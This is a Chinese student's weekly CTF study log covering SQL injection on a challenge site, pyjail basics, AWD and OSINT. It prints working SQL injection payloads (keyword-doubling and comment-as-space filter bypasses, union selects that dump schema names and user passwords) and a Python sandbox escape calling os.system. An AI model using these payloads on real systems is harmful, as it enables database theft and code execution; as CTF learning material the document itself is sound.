<a name="hP6d6"></a>
# 本周内容
1. sql基础学习
2. 复现ISCTF
3. 初学awd
4. pyjail
5. 开源情报
<a name="UQs5e"></a>
# 成果展示
1.easy_website<br />上次写的一知半解，把网上的语句抄过来就出了，现在正儿八经学一下sql
```sql
1'oorrder/**/by/**/1#
```
测试出只有一列,那就不用查回显了<br />然后依次用下面的指令查表查库查字段<br />最后直接查password就可以了<br />语句是union select password from users#
```sql
select schema_name from information_schema.schemata（查库）
select table_name from information_schema.tables where table_schema=库名（查表）
select column_name from information_schema.colums where table_name=表名（差列）
select 列名 from 库名.表名（查数据）
```
然后试出来在flag在第三行，在后面加上limit 2,3就可以了<br />但是这个方法仅限于行数不多的情况下，如果行数多了我们就要另找办法<br />总结：

1. #,--+可以注释
2. /**/空格绕过
```sql
order by num#
```
```sql
-1'union select 1#
```
```sql
union select from database()#
```
```sql
union select group_concat(table_name) from information_schema.tables where table_schema=database()#
```
```sql
union select group_concat(column_name) from information_schema.columns where table_schema=database()#
```
```sql
union select group_concat(0x7e,password) from users.users #
```
2.堆叠注入(暂时搁置)<br />在SQL中，分号（;）是用来表示一条sql语句的结束<br />3.pyjail<br />首先了解pyjail中eval的基础用法<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1701778549305-e5872081-e163-46ca-b842-4283c4ec91a4.png#averageHue=%23161616&clientId=u353fd0bb-2f13-4&from=paste&height=231&id=u0c394ac2&originHeight=519&originWidth=993&originalType=binary&ratio=2.25&rotation=0&showTitle=false&size=37345&status=done&style=none&taskId=u03f1543d-2559-46c8-a878-2cac690bfc2&title=&width=441.3333333333333)
```python
__import__('os').system('cat flag')
```
4.看awd的书
<a name="DQhzr"></a>
# 心得
这周事情很杂，开源情报还忙着看机顶盒的镜像，还要忙期末考试，后面就把重心放在期末考试上了
